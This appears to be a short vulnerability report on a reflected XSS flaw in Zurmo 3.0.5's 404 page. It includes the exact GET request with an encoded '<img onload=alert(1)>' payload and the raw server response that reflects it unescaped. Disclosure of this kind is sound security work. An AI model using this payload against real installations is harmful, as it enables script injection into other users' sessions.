In a naive default install of the OpenSource Zurmo 3.0.5 on Debian Jessie it was noted that some 404 error messages are not properly escaped.
GET /app/index.php/accounts/default/autoCompletedcb81%3cimg%20src%3da%20onload%3dalert(1)%3e93a48?term=C HTTP/1.1
Resulted in reflected XSS attack in the 404 page.
I wondered if this might be fixed in later versions of YII framework as it wasn't immediately apparent that what is happening .
HTTP/1.0 404 Not Found Date: Tue, 22 Dec 2015 00:34:58 GMT Server: Apache/2.4.10 (Debian) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 218 Connection: close Content-Type: text/html; charset=UTF-8 The system is unable to find the requested action "autoCompletedcb81<img src=a onload=alert(1)>93a48".<script>$('#zurmoSentryId').append('The reference id for this error is d1212d41ec9b45bb91201c6c52a4f98d.');</script>